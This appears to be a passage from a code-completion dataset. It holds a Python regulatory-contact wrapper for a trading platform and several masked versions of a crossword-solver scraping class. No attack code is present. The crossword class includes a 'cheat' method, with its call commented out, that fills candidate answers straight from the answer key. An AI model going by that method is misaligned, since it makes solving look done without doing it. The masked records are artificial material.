birth of the concerned natural person\"\"\"\n ael_reg_dob = None\n if reg_date_of_birth != VALUE_NOT_SET:\n try:\n ael_reg_dob = ael.date_from_string(reg_date_of_birth)\n except:\n if reg_date_of_birth not in ['', None]:\n msg = (\n 'The value <%s> provided for DateOfBirth is invalid and hence will not be set of the DateOfBirth AdditionalInfo'\n % reg_date_of_birth)\n FRegulatoryLogger.ERROR(logger, msg)\n raise FRegulatoryInfoException.FRegInfoInvalidData(msg)\n if ael_reg_dob:\n self.__reg_date_of_birth = reg_date_of_birth\n else:\n self.__reg_date_of_birth = None\n try:\n self.__contact.AdditionalInfo().DateOfBirth(self.\n __reg_date_of_birth)\n except:\n pass\n else:\n return self.__reg_date_of_birth\n\n def FirstName(self, reg_first_name=VALUE_NOT_SET):\n \"\"\"First name of the concerned natural person\"\"\"\n if reg_first_name != VALUE_NOT_SET:\n self.__reg_first_name = reg_first_name\n try:\n self.__contact.AdditionalInfo().FirstName(self.__reg_first_name\n )\n except:\n pass\n else:\n if not self.__reg_first_name:\n self.__reg_first_name = None\n return self.__reg_first_name\n\n def LastName(self, reg_last_name=VALUE_NOT_SET):\n \"\"\"Last name of the concerned natural person\"\"\"\n if reg_last_name != VALUE_NOT_SET:\n self.__reg_last_name = reg_last_name\n try:\n self.__contact.AdditionalInfo().LastName(self.__reg_last_name)\n except:\n pass\n else:\n if not self.__reg_last_name:\n self.__reg_last_name = None\n return self.__reg_last_name\n\n def NationalId(self, reg_national_id=VALUE_NOT_SET):\n \"\"\"NationalId of the concerned natural person\"\"\"\n if reg_national_id != VALUE_NOT_SET:\n self.__reg_national_id = reg_national_id\n try:\n self.__contact.AdditionalInfo().NationalId(self.\n __reg_national_id)\n except:\n pass\n else:\n if not self.__reg_national_id:\n self.__reg_national_id = None\n return self.__reg_national_id\n\n def CrmId(self, crm_id=VALUE_NOT_SET):\n \"\"\"CrmId of the concerned natural person\"\"\"\n if crm_id != VALUE_NOT_SET:\n 
self.__reg_crm_id = crm_id\n try:\n self.__contact.AdditionalInfo().RegContactCrmId(self.\n __reg_crm_id)\n except:\n pass\n else:\n if not self.__reg_crm_id:\n self.__reg_crm_id = None\n return self.__reg_crm_id\n\n def ExchangeId(self, exchange_id=VALUE_NOT_SET):\n \"\"\"The identifier used towards/by an exchange to identify a person or legal entity, before the actual national id or the LEI is divulged.\"\"\"\n if exchange_id != VALUE_NOT_SET:\n if str(exchange_id).isdigit():\n self.__reg_exchange_id = int(exchange_id)\n elif str(exchange_id) in ['None', '']:\n self.__reg_exchange_id = None\n else:\n msg = (\n 'The ExchangeId provided <%s> is not of the expected integer format'\n % str(exchange_id))\n FRegulatoryLogger.ERROR(logger, msg)\n raise FRegulatoryInfoException.FRegInfoInvalidData(msg)\n try:\n self.__contact.AdditionalInfo().RegContExchangeId(self.\n __reg_exchange_id)\n except:\n pass\n else:\n if not self.__reg_exchange_id:\n self.__reg_exchange_id = None\n return self.__reg_exchange_id\n\n def UniqueName(self, unique_name=VALUE_NOT_SET):\n \"\"\"An optional unique name, if specified there can only be one contact with this name for each party.\"\"\"\n if unique_name != VALUE_NOT_SET:\n try:\n if (FIntegrationUtils.FIntegrationUtils.\n get_acm_version_override() >= 2017.2):\n self.__contact.UniqueName(unique_name)\n else:\n is_unique, contact_name = FRegulatoryUtils.is_unique_name(\n self.__contact, unique_name)\n if is_unique:\n try:\n self.__contact.AdditionalInfo().UniqueName(\n unique_name)\n except:\n pass\n else:\n msg = (\n 'The uniqueName <%s> provided for contact <%s> on party <%s> is not unique. 
Another contact <%s> already has this unique name.'\n % (unique_name, self.__contact.Fullname(),\n self.__contact.Party().Name(), contact_name))\n FRegulatoryLogger.ERROR(logger, msg)\n raise FRegulatoryInfoException.FRegInfoInvalidData(msg)\n self.__reg_unique_name = unique_name\n except Exception as e:\n FRegulatoryLogger.ERROR(logger, str(e))\n raise FRegulatoryInfoException.FRegInfoInvalidData(str(e))\n else:\n if not self.__reg_unique_name:\n self.__reg_unique_name = None\n return self.__reg_unique_name\n\n def ClientType(self):\n \"\"\"returns the ClientType based on where the CrmId is found on the linked objects\"\"\"\n self.__client_type = FRegulatoryUtils.getClientType(self.__contact)\n return self.__client_type\n\n def JointAccount(self):\n \"\"\"Another trader that jointly owns the account with this trader\"\"\"\n joint_accounts = []\n if self.IsGeneralPartner():\n for contact in self.__contact.Party().Contacts():\n if contact.AdditionalInfo().RegGeneralPartner():\n joint_accounts.append(contact)\n else:\n FRegulatoryLogger.WARN(logger, \n '<%s> is not a General Partner. Hence JointAccount is None' %\n self.__contact.Fullname())\n joint_accounts = None\n return joint_accounts\n\n def IsGeneralPartner(self, is_general_partner=VALUE_NOT_SET):\n \"\"\"General partner has responsibility for the actions of the business, can legally bind\n the business and is personally liable for all the business's debts and obligations.\"\"\"\n if is_general_partner != VALUE_NOT_SET:\n self.__is_general_partner = FRegulatoryUtils.get_bool(\n is_general_partner, 'IsGeneralPartner')\n FRegulatoryLogger.DEBUG(logger, \n 'The IsGeneralPartner is being set to <%s>.' % str(self.\n __is_general_partner))\n try:\n self.__contact.AdditionalInfo().RegGeneralPartner(self.\n __is_general_partner)\n except:\n pass\n else:\n if str(self.__is_general_partner) == 'None':\n FRegulatoryLogger.DEBUG(logger,\n 'The IsGeneralPartner is None. 
Hence defaulting it to False'\n )\n self.__is_general_partner = False\n return self.__is_general_partner\n\n def __setattr__(self, attr, val):\n if attr.startswith('_'):\n super(FContactRegulatoryInfoBase, self).__setattr__(attr, val)\n elif hasattr(self, attr):\n getattr(self, attr)(val)\n\n def Commit(self):\n \"\"\"Committing this instance will automatically commit all the RegulatorySupport related attributes on the contact\"\"\"\n try:\n acm.BeginTransaction()\n self.__contact.Commit()\n if FIntegrationUtils.FIntegrationUtils.get_acm_version_override(\n ) < 2015.4:\n self.__integration_utils.set_additional_info('DateOfBirth',\n self.__contact, self.__reg_date_of_birth)\n self.__integration_utils.set_additional_info('FirstName',\n self.__contact, self.__reg_first_name)\n self.__integration_utils.set_additional_info('LastName',\n self.__contact, self.__reg_last_name)\n self.__integration_utils.set_additional_info('NationalId',\n self.__contact, self.__reg_national_id)\n self.__integration_utils.set_additional_info('RegContactCrmId',\n self.__contact, self.__reg_crm_id)\n self.__integration_utils.set_additional_info(\n 'RegContExchangeId', self.__contact, self.__reg_exchange_id\n )\n self.__integration_utils.set_additional_info('UniqueName',\n self.__contact, self.__reg_unique_name)\n self.__integration_utils.set_additional_info(\n 'RegGeneralPartner', self.__contact, self.\n __is_general_partner)\n acm.CommitTransaction()\n except Exception as e:\n FRegulatoryLogger.ERROR(logger, str(e))\n FRegulatoryLogger.ERROR(logger, 'ABORTING TRANSACTION***********')\n acm.AbortTransaction()\n\n def Delete(self):\n \"\"\"Deleting this instance automatically deletes all the attributes related to the reporting on the instrument or on the ContactRegulatoryInfo in the ADS\"\"\"\n FRegulatoryUtils.Delete(self.__contact, 'Contact')\n FRegulatoryLogger.DEBUG(logger,\n 'Deleted all AdditionalInfos on Contact related to Regulatory Reporting'\n )\n\n def Attributes(self):\n 
\"\"\"returns the attributes on the FContactRegulatoryInfoBase instance\"\"\"\n return FRegulatoryUtils.log_attributes('FContactRegulatoryInfo', self)\n\n\ndef RegulatoryInfo(self):\n \"\"\"returns the FContactRegulatoryInfoBase instance for the given contact\"\"\"\n conactRegInfo = FContactRegulatoryInfo(self)\n return conactRegInfo\n\n\ndef Select(query):\n \"\"\"Return a collection of FContactRegulatoryInfoBase instances matching constraint specified in the Select query\"\"\"\n party = None\n if query.find('and party') != -1:\n pos = query.find('and party')\n party_name = query[pos + len('and party'):]\n query = query[0:pos]\n party_name = party_name.replace('=', '').replace(\"'\", '')\n party_name = party_name.strip()\n party = acm.FParty[party_name]\n return_result = FRegulatoryUtils.Select(query, 'FContact', party)\n return return_result\n",
"step-5": "\"\"\"------------------------------------------------------------------------\nMODULE\n FContactRegulatoryInfoBase -\nDESCRIPTION:\n This file provides the custom instance of RegulatoryInfo on the Contact which has all the RegulatoryInfo related methods\nVERSION: 1.0.25(0.25.7)\nRESTRICTIONS/ LIMITATIONS:\n 1. Any modifications to the scripts/ encrypted modules/ clear text code within the core is not supported.\n 2. This module is not customizable\n 3. The component may not work as expected with any modifications done to this module at user end\n--------------------------------------------------------------------------\"\"\"\nimport string\nimport acm\nimport FIntegrationUtils\nimport FRegulatoryLogger\nimport ael\nimport FRegulatoryUtils\nimport FRegulatoryInfoException\nlogger = 'FContactRegulatoryInfoBase'\nVALUE_NOT_SET = ()\n\nclass FContactRegulatoryInfoBase(object):\n def __init__(self, contact = None):\n \"\"\"class that maintains all data related to the regulatory on the FContact\"\"\"\n try:\n self.__contact = contact\n if not self.__contact:\n FRegulatoryLogger.ERROR(logger, \"The name on the contact is the unique identifier of the contact. 
Kindly provide a valid acm.FContact object\")\n return None\n self.__reg_date_of_birth = None\n self.__reg_first_name = None\n self.__reg_last_name = None\n self.__reg_national_id = None\n self.__reg_crm_id = None\n self.__crm_id_source = None\n self.__reg_exchange_id = None\n self.__reg_unique_name = None\n self.__client_type = None\n self.__is_general_partner = None\n if contact:\n self.__refresh(contact)\n self.__integration_utils = FIntegrationUtils.FIntegrationUtils()\n except Exception as e :\n FRegulatoryLogger.ERROR(logger, str(e))\n\n def __refresh(self, contact):\n self.__reg_date_of_birth = FRegulatoryUtils.get_addinfo_value('dateOfBirth', self.__contact)\n self.__reg_first_name = FRegulatoryUtils.get_addinfo_value('firstName', self.__contact)\n self.__reg_last_name = FRegulatoryUtils.get_addinfo_value('lastName', self.__contact)\n self.__reg_national_id = FRegulatoryUtils.get_addinfo_value('nationalId', self.__contact)\n self.__is_general_partner = FRegulatoryUtils.get_addinfo_value('regGeneralPartner', self.__contact)\n self.__reg_crm_id = FRegulatoryUtils.get_addinfo_value('regContactCrmId', self.__contact)\n self.__reg_exchange_id = FRegulatoryUtils.get_addinfo_value('regContExchangeId', self.__contact)\n try:\n self.__reg_unique_name = self.__contact.UniqueName()\n except:\n self.__reg_unique_name = FRegulatoryUtils.get_addinfo_value('uniqueName', self.__contact)\n\n def Contact(self):\n \"\"\"returns the contact for which this wrapper has all the addinfo/column values\"\"\"\n return self.__contact\n\n def DateOfBirth(self, reg_date_of_birth = VALUE_NOT_SET):\n \"\"\"Date of birth of the concerned natural person\"\"\"\n ael_reg_dob = None\n if reg_date_of_birth != VALUE_NOT_SET:\n try:\n ael_reg_dob = ael.date_from_string(reg_date_of_birth)\n except:\n if reg_date_of_birth not in ['', None]:\n msg = \"The value <%s> provided for DateOfBirth is invalid and hence will not be set of the DateOfBirth AdditionalInfo\"%reg_date_of_birth\n 
FRegulatoryLogger.ERROR(logger, msg)\n raise FRegulatoryInfoException.FRegInfoInvalidData(msg)\n if ael_reg_dob:\n self.__reg_date_of_birth = reg_date_of_birth\n else:\n self.__reg_date_of_birth = None\n try:\n self.__contact.AdditionalInfo().DateOfBirth(self.__reg_date_of_birth)\n except:\n pass\n else:\n return self.__reg_date_of_birth\n\n def FirstName(self, reg_first_name = VALUE_NOT_SET):\n \"\"\"First name of the concerned natural person\"\"\"\n if reg_first_name != VALUE_NOT_SET:\n self.__reg_first_name = reg_first_name\n try:\n self.__contact.AdditionalInfo().FirstName(self.__reg_first_name)\n except:\n pass\n else:\n if not self.__reg_first_name:\n self.__reg_first_name = None\n return self.__reg_first_name\n\n def LastName(self, reg_last_name = VALUE_NOT_SET):\n \"\"\"Last name of the concerned natural person\"\"\"\n if reg_last_name != VALUE_NOT_SET:\n self.__reg_last_name = reg_last_name\n try:\n self.__contact.AdditionalInfo().LastName(self.__reg_last_name)\n except:\n pass\n else:\n if not self.__reg_last_name:\n self.__reg_last_name = None\n return self.__reg_last_name\n\n def NationalId(self, reg_national_id = VALUE_NOT_SET):\n \"\"\"NationalId of the concerned natural person\"\"\"\n if reg_national_id != VALUE_NOT_SET:\n self.__reg_national_id = reg_national_id\n try:\n self.__contact.AdditionalInfo().NationalId(self.__reg_national_id)\n except:\n pass\n else:\n if not self.__reg_national_id:\n self.__reg_national_id = None\n return self.__reg_national_id\n\n def CrmId(self, crm_id = VALUE_NOT_SET):\n \"\"\"CrmId of the concerned natural person\"\"\"\n if crm_id != VALUE_NOT_SET:\n self.__reg_crm_id = crm_id\n try:\n self.__contact.AdditionalInfo().RegContactCrmId(self.__reg_crm_id)\n except:\n pass\n else:\n if not self.__reg_crm_id:\n self.__reg_crm_id = None\n return self.__reg_crm_id\n\n def ExchangeId(self, exchange_id = VALUE_NOT_SET):\n \"\"\"The identifier used towards/by an exchange to identify a person or legal entity, before the actual 
national id or the LEI is divulged.\"\"\"\n if exchange_id != VALUE_NOT_SET:\n if str(exchange_id).isdigit():\n self.__reg_exchange_id = int(exchange_id)\n elif str(exchange_id) in ['None', '']:\n self.__reg_exchange_id = None\n else:\n msg = \"The ExchangeId provided <%s> is not of the expected integer format\"%str(exchange_id)\n FRegulatoryLogger.ERROR(logger, msg)\n raise FRegulatoryInfoException.FRegInfoInvalidData(msg)\n try:\n self.__contact.AdditionalInfo().RegContExchangeId(self.__reg_exchange_id)\n except:\n pass\n else:\n if not self.__reg_exchange_id:\n self.__reg_exchange_id = None\n return self.__reg_exchange_id\n\n def UniqueName(self, unique_name = VALUE_NOT_SET):\n \"\"\"An optional unique name, if specified there can only be one contact with this name for each party.\"\"\"\n if unique_name != VALUE_NOT_SET:\n try:\n if FIntegrationUtils.FIntegrationUtils.get_acm_version_override() >= 2017.2:\n self.__contact.UniqueName(unique_name)\n else:\n is_unique, contact_name = FRegulatoryUtils.is_unique_name(self.__contact, unique_name)\n if is_unique:\n try:\n self.__contact.AdditionalInfo().UniqueName(unique_name)\n except:\n pass\n else:\n msg = \"The uniqueName <%s> provided for contact <%s> on party <%s> is not unique. 
Another contact <%s> already has this unique name.\"%(unique_name, self.__contact.Fullname(), self.__contact.Party().Name(), contact_name)\n FRegulatoryLogger.ERROR(logger, msg)\n raise FRegulatoryInfoException.FRegInfoInvalidData(msg)\n self.__reg_unique_name = unique_name\n except Exception as e:\n FRegulatoryLogger.ERROR(logger, str(e))\n raise FRegulatoryInfoException.FRegInfoInvalidData(str(e))\n else:\n if not self.__reg_unique_name:\n self.__reg_unique_name = None\n return self.__reg_unique_name\n\n def ClientType(self):\n \"\"\"returns the ClientType based on where the CrmId is found on the linked objects\"\"\"\n self.__client_type = FRegulatoryUtils.getClientType(self.__contact)\n return self.__client_type\n\n def JointAccount(self):\n \"\"\"Another trader that jointly owns the account with this trader\"\"\"\n joint_accounts = []\n if self.IsGeneralPartner():\n for contact in self.__contact.Party().Contacts(): \n if contact.AdditionalInfo().RegGeneralPartner(): \n joint_accounts.append(contact)\n else:\n FRegulatoryLogger.WARN(logger, \"<%s> is not a General Partner. Hence JointAccount is None\"%self.__contact.Fullname())\n joint_accounts = None\n return joint_accounts \n\n def IsGeneralPartner(self, is_general_partner = VALUE_NOT_SET):\n \"\"\"General partner has responsibility for the actions of the business, can legally bind\n the business and is personally liable for all the business's debts and obligations.\"\"\"\n if is_general_partner != VALUE_NOT_SET:\n self.__is_general_partner = FRegulatoryUtils.get_bool(is_general_partner, 'IsGeneralPartner')\n FRegulatoryLogger.DEBUG(logger, \"The IsGeneralPartner is being set to <%s>.\"%(str(self.__is_general_partner)))\n try:\n self.__contact.AdditionalInfo().RegGeneralPartner(self.__is_general_partner)\n except:\n pass\n\n else:\n if str(self.__is_general_partner) == \"None\":\n FRegulatoryLogger.DEBUG(logger, \"The IsGeneralPartner is None. 
Hence defaulting it to False\")\n self.__is_general_partner = False\n return self.__is_general_partner\n\n def __setattr__(self, attr, val):\n if attr.startswith('_'):\n super(FContactRegulatoryInfoBase, self).__setattr__(attr, val)\n else:\n if hasattr(self, attr):\n getattr(self, attr)(val)\n\n def Commit(self):\n \"\"\"Committing this instance will automatically commit all the RegulatorySupport related attributes on the contact\"\"\"\n try:\n acm.BeginTransaction()\n self.__contact.Commit()\n if FIntegrationUtils.FIntegrationUtils.get_acm_version_override() < 2015.4:\n self.__integration_utils.set_additional_info('DateOfBirth', self.__contact, self.__reg_date_of_birth)\n self.__integration_utils.set_additional_info('FirstName', self.__contact, self.__reg_first_name)\n self.__integration_utils.set_additional_info('LastName', self.__contact, self.__reg_last_name)\n self.__integration_utils.set_additional_info('NationalId', self.__contact, self.__reg_national_id)\n self.__integration_utils.set_additional_info('RegContactCrmId', self.__contact, self.__reg_crm_id)\n self.__integration_utils.set_additional_info('RegContExchangeId', self.__contact, self.__reg_exchange_id)\n self.__integration_utils.set_additional_info('UniqueName', self.__contact, self.__reg_unique_name)\n self.__integration_utils.set_additional_info('RegGeneralPartner', self.__contact, self.__is_general_partner)\n acm.CommitTransaction()\n except Exception as e:\n FRegulatoryLogger.ERROR(logger, str(e))\n FRegulatoryLogger.ERROR(logger, \"ABORTING TRANSACTION***********\")\n acm.AbortTransaction()\n\n def Delete(self):\n \"\"\"Deleting this instance automatically deletes all the attributes related to the reporting on the instrument or on the ContactRegulatoryInfo in the ADS\"\"\"\n FRegulatoryUtils.Delete(self.__contact, \"Contact\")\n FRegulatoryLogger.DEBUG(logger, \"Deleted all AdditionalInfos on Contact related to Regulatory Reporting\")\n\n def Attributes(self):\n \"\"\"returns the attributes on 
the FContactRegulatoryInfoBase instance\"\"\"\n return FRegulatoryUtils.log_attributes('FContactRegulatoryInfo', self)\n\ndef RegulatoryInfo(self):\n \"\"\"returns the FContactRegulatoryInfoBase instance for the given contact\"\"\"\n conactRegInfo = FContactRegulatoryInfo(self)\n return conactRegInfo\n\ndef Select(query):\n \"\"\"Return a collection of FContactRegulatoryInfoBase instances matching constraint specified in the Select query\"\"\"\n party = None\n if query.find('and party') != -1:#it means there is an additional condition added\n pos = query.find('and party')\n party_name = query[(pos + len('and party')):]\n query = query[0:pos]\n party_name = party_name.replace('=', '').replace(\"'\", '')\n party_name = party_name.strip()\n party = acm.FParty[party_name]\n return_result = FRegulatoryUtils.Select(query, \"FContact\", party)\n return return_result\n\n",
"step-ids": [
13,
15,
18,
20,
23
]
}
|
[
13,
15,
18,
20,
23
] |
<|reserved_special_token_0|>
class Scraping:
def __init__(self, clues, answers, gridIndex):
self.clues = clues
self.domains = {'across': {}, 'down': {}}
self.answers = answers
self.gridIndex = gridIndex
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def getSynonyms(self, toSearch):
return searchSynonyms(toSearch, self.clues['across'], self.clues[
'down'])
def cheat(self):
for across in self.clues['across']:
for row in range(0, 5):
for col in range(0, 5):
if self.gridIndex[row][col] == across:
answer = ''
for colIn in range(0, 5):
if self.answers[row][colIn] != '-':
answer = answer + self.answers[row][colIn]
self.domains['across'][across] = self.domains['across'
][across] + ' ' + answer
for down in self.clues['down']:
for row in range(0, 5):
for col in range(0, 5):
if self.gridIndex[row][col] == down:
answer = ''
for rowIn in range(0, 5):
if self.answers[rowIn][col] != '-':
answer = answer + self.answers[rowIn][col]
self.domains['down'][down] = self.domains['down'][down
] + ' ' + answer
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Scraping:
def __init__(self, clues, answers, gridIndex):
self.clues = clues
self.domains = {'across': {}, 'down': {}}
self.answers = answers
self.gridIndex = gridIndex
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def search(self, clue):
domain = set()
wiki_set = set()
synonym_set = set()
toSearch = clue
"""
print("Google search for:", toSearch)
try:
domain = domain + self.getGoogle(toSearch)
except:
print("An exception occurred")
"""
print('Wikipedia search for:', toSearch)
try:
wiki_set = wiki_set | self.getWiki(toSearch)
except:
print('An exception occurred')
print('Synonym search from Datamuse and Merriam-Webster for:', toSearch
)
try:
synonym_set = synonym_set | self.getSynonyms(toSearch)
except:
print('An exception occurred')
"""
print("Merriam Webster search for:", toSearch)
try:
merriam_set = merriam_set | self.getMerriam(toSearch)
except:
print("An exception occurred")
"""
domain = domain.union(wiki_set, synonym_set)
return ' '.join(str(e) for e in domain)
<|reserved_special_token_0|>
def getWiki(self, toSearch):
return searchWikipedia(toSearch)
<|reserved_special_token_0|>
def getSynonyms(self, toSearch):
return searchSynonyms(toSearch, self.clues['across'], self.clues[
'down'])
def cheat(self):
for across in self.clues['across']:
for row in range(0, 5):
for col in range(0, 5):
if self.gridIndex[row][col] == across:
answer = ''
for colIn in range(0, 5):
if self.answers[row][colIn] != '-':
answer = answer + self.answers[row][colIn]
self.domains['across'][across] = self.domains['across'
][across] + ' ' + answer
for down in self.clues['down']:
for row in range(0, 5):
for col in range(0, 5):
if self.gridIndex[row][col] == down:
answer = ''
for rowIn in range(0, 5):
if self.answers[rowIn][col] != '-':
answer = answer + self.answers[rowIn][col]
self.domains['down'][down] = self.domains['down'][down
] + ' ' + answer
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Scraping:
def __init__(self, clues, answers, gridIndex):
self.clues = clues
self.domains = {'across': {}, 'down': {}}
self.answers = answers
self.gridIndex = gridIndex
def setDomains(self):
for down in self.clues['down']:
self.domains['down'][down] = self.search(self.clues['down'][down])
for across in self.clues['across']:
self.domains['across'][across] = self.search(self.clues[
'across'][across])
<|reserved_special_token_0|>
def search(self, clue):
domain = set()
wiki_set = set()
synonym_set = set()
toSearch = clue
"""
print("Google search for:", toSearch)
try:
domain = domain + self.getGoogle(toSearch)
except:
print("An exception occurred")
"""
print('Wikipedia search for:', toSearch)
try:
wiki_set = wiki_set | self.getWiki(toSearch)
except:
print('An exception occurred')
print('Synonym search from Datamuse and Merriam-Webster for:', toSearch
)
try:
synonym_set = synonym_set | self.getSynonyms(toSearch)
except:
print('An exception occurred')
"""
print("Merriam Webster search for:", toSearch)
try:
merriam_set = merriam_set | self.getMerriam(toSearch)
except:
print("An exception occurred")
"""
domain = domain.union(wiki_set, synonym_set)
return ' '.join(str(e) for e in domain)
def getGoogle(self, toSearch):
return 'toSearch'
def getWiki(self, toSearch):
return searchWikipedia(toSearch)
def getMerriam(self, toSearch):
return searchMerriamWebster(toSearch)
def getSynonyms(self, toSearch):
return searchSynonyms(toSearch, self.clues['across'], self.clues[
'down'])
def cheat(self):
for across in self.clues['across']:
for row in range(0, 5):
for col in range(0, 5):
if self.gridIndex[row][col] == across:
answer = ''
for colIn in range(0, 5):
if self.answers[row][colIn] != '-':
answer = answer + self.answers[row][colIn]
self.domains['across'][across] = self.domains['across'
][across] + ' ' + answer
for down in self.clues['down']:
for row in range(0, 5):
for col in range(0, 5):
if self.gridIndex[row][col] == down:
answer = ''
for rowIn in range(0, 5):
if self.answers[rowIn][col] != '-':
answer = answer + self.answers[rowIn][col]
self.domains['down'][down] = self.domains['down'][down
] + ' ' + answer
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from getMerriamWebster import searchMerriamWebster
from searchWikipedia import searchWikipedia
from synonyms import searchSynonyms
class Scraping:
def __init__(self, clues, answers, gridIndex):
self.clues = clues
self.domains = {'across': {}, 'down': {}}
self.answers = answers
self.gridIndex = gridIndex
def setDomains(self):
for down in self.clues['down']:
self.domains['down'][down] = self.search(self.clues['down'][down])
for across in self.clues['across']:
self.domains['across'][across] = self.search(self.clues[
'across'][across])
def getClueList(self, clue):
clueList = [clue]
return clueList
def search(self, clue):
domain = set()
wiki_set = set()
synonym_set = set()
toSearch = clue
"""
print("Google search for:", toSearch)
try:
domain = domain + self.getGoogle(toSearch)
except:
print("An exception occurred")
"""
print('Wikipedia search for:', toSearch)
try:
wiki_set = wiki_set | self.getWiki(toSearch)
except:
print('An exception occurred')
print('Synonym search from Datamuse and Merriam-Webster for:', toSearch
)
try:
synonym_set = synonym_set | self.getSynonyms(toSearch)
except:
print('An exception occurred')
"""
print("Merriam Webster search for:", toSearch)
try:
merriam_set = merriam_set | self.getMerriam(toSearch)
except:
print("An exception occurred")
"""
domain = domain.union(wiki_set, synonym_set)
return ' '.join(str(e) for e in domain)
def getGoogle(self, toSearch):
return 'toSearch'
def getWiki(self, toSearch):
return searchWikipedia(toSearch)
def getMerriam(self, toSearch):
return searchMerriamWebster(toSearch)
def getSynonyms(self, toSearch):
return searchSynonyms(toSearch, self.clues['across'], self.clues[
'down'])
def cheat(self):
for across in self.clues['across']:
for row in range(0, 5):
for col in range(0, 5):
if self.gridIndex[row][col] == across:
answer = ''
for colIn in range(0, 5):
if self.answers[row][colIn] != '-':
answer = answer + self.answers[row][colIn]
self.domains['across'][across] = self.domains['across'
][across] + ' ' + answer
for down in self.clues['down']:
for row in range(0, 5):
for col in range(0, 5):
if self.gridIndex[row][col] == down:
answer = ''
for rowIn in range(0, 5):
if self.answers[rowIn][col] != '-':
answer = answer + self.answers[rowIn][col]
self.domains['down'][down] = self.domains['down'][down
] + ' ' + answer
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from getMerriamWebster import searchMerriamWebster
from searchWikipedia import searchWikipedia
from synonyms import searchSynonyms
class Scraping:
def __init__(self, clues, answers, gridIndex):
self.clues = clues
self.domains = {"across": {}, "down":{}}
self.answers = answers
self.gridIndex = gridIndex
def setDomains(self):
for down in self.clues["down"]:
self.domains["down"][down] = self.search(self.clues["down"][down])
for across in self.clues["across"]:
self.domains["across"][across] = self.search(self.clues["across"][across])
#======================== CHEAT =============================
#self.cheat()
def getClueList(self, clue):
clueList = [clue]
return clueList
def search(self, clue):
domain = set()
wiki_set = set()
synonym_set = set()
toSearch = clue
"""
print("Google search for:", toSearch)
try:
domain = domain + self.getGoogle(toSearch)
except:
print("An exception occurred")
"""
print("Wikipedia search for:", toSearch)
try:
wiki_set = wiki_set | self.getWiki(toSearch)
except:
print("An exception occurred")
print("Synonym search from Datamuse and Merriam-Webster for:", toSearch)
try:
synonym_set = synonym_set | self.getSynonyms(toSearch)
except:
print("An exception occurred")
"""
print("Merriam Webster search for:", toSearch)
try:
merriam_set = merriam_set | self.getMerriam(toSearch)
except:
print("An exception occurred")
"""
domain = domain.union(wiki_set, synonym_set)
return ' '.join(str(e) for e in domain) #''.join(str(e) for e in words)
def getGoogle(self, toSearch):
return "toSearch"
def getWiki(self, toSearch):
return searchWikipedia(toSearch)
def getMerriam(self,toSearch):
return searchMerriamWebster(toSearch)
def getSynonyms(self, toSearch):
return searchSynonyms(toSearch, self.clues["across"], self.clues["down"])
def cheat(self):
for across in self.clues["across"]:
for row in range(0,5):
for col in range(0,5):
if self.gridIndex[row][col] == across:
answer = ""
for colIn in range(0,5):
if self.answers[row][colIn] != "-":
answer = answer + self.answers[row][colIn]
self.domains["across"][across] = self.domains["across"][across] + " " + answer
#print(answer)
for down in self.clues["down"]:
for row in range(0,5):
for col in range(0,5):
if self.gridIndex[row][col] == down:
answer = ""
for rowIn in range(0,5):
if self.answers[rowIn][col] != "-":
answer = answer + self.answers[rowIn][col]
self.domains["down"][down] = self.domains["down"][down] + " " + answer
#print(answer)
"""
scraping = Scraping()
scraping.setDomains()
print(scraping.domains)
"""
|
flexible
|
{
"blob_id": "138abb40fda0f19b4a74a294d5cd0dd326dc59ce",
"index": 7722,
"step-1": "<mask token>\n\n\nclass Scraping:\n\n def __init__(self, clues, answers, gridIndex):\n self.clues = clues\n self.domains = {'across': {}, 'down': {}}\n self.answers = answers\n self.gridIndex = gridIndex\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def getSynonyms(self, toSearch):\n return searchSynonyms(toSearch, self.clues['across'], self.clues[\n 'down'])\n\n def cheat(self):\n for across in self.clues['across']:\n for row in range(0, 5):\n for col in range(0, 5):\n if self.gridIndex[row][col] == across:\n answer = ''\n for colIn in range(0, 5):\n if self.answers[row][colIn] != '-':\n answer = answer + self.answers[row][colIn]\n self.domains['across'][across] = self.domains['across'\n ][across] + ' ' + answer\n for down in self.clues['down']:\n for row in range(0, 5):\n for col in range(0, 5):\n if self.gridIndex[row][col] == down:\n answer = ''\n for rowIn in range(0, 5):\n if self.answers[rowIn][col] != '-':\n answer = answer + self.answers[rowIn][col]\n self.domains['down'][down] = self.domains['down'][down\n ] + ' ' + answer\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Scraping:\n\n def __init__(self, clues, answers, gridIndex):\n self.clues = clues\n self.domains = {'across': {}, 'down': {}}\n self.answers = answers\n self.gridIndex = gridIndex\n <mask token>\n <mask token>\n\n def search(self, clue):\n domain = set()\n wiki_set = set()\n synonym_set = set()\n toSearch = clue\n \"\"\"\n print(\"Google search for:\", toSearch)\n try:\n domain = domain + self.getGoogle(toSearch)\n except:\n print(\"An exception occurred\")\n \"\"\"\n print('Wikipedia search for:', toSearch)\n try:\n wiki_set = wiki_set | self.getWiki(toSearch)\n except:\n print('An exception occurred')\n print('Synonym search from Datamuse and Merriam-Webster for:', toSearch\n )\n try:\n synonym_set = synonym_set | self.getSynonyms(toSearch)\n except:\n print('An exception occurred')\n \"\"\"\n print(\"Merriam Webster search for:\", toSearch)\n try:\n merriam_set = merriam_set | self.getMerriam(toSearch)\n except:\n print(\"An exception occurred\")\n \"\"\"\n domain = domain.union(wiki_set, synonym_set)\n return ' '.join(str(e) for e in domain)\n <mask token>\n\n def getWiki(self, toSearch):\n return searchWikipedia(toSearch)\n <mask token>\n\n def getSynonyms(self, toSearch):\n return searchSynonyms(toSearch, self.clues['across'], self.clues[\n 'down'])\n\n def cheat(self):\n for across in self.clues['across']:\n for row in range(0, 5):\n for col in range(0, 5):\n if self.gridIndex[row][col] == across:\n answer = ''\n for colIn in range(0, 5):\n if self.answers[row][colIn] != '-':\n answer = answer + self.answers[row][colIn]\n self.domains['across'][across] = self.domains['across'\n ][across] + ' ' + answer\n for down in self.clues['down']:\n for row in range(0, 5):\n for col in range(0, 5):\n if self.gridIndex[row][col] == down:\n answer = ''\n for rowIn in 